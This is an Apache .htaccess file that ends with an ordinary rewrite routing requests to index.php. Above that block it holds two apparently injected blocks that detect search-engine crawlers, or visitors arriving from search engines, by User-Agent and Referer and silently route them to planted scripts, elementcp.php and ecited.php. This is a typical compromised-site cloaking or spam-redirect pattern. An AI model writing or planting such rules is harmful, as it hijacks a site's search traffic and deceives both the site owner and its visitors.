RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|bing|yahoo|msn|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|msn|aol|duckduck)
RewriteRule ^(.*)$ elementcp.php?$1 [L]
RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|bing|yahoo|msn|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|msn|aol|duckduck)
RewriteRule ^(.*)$ ecited.php?$1 [L]
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/system.*
RewriteRule ^(.*)$ index.php?/$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.+)$ index.php?/$1 [L]



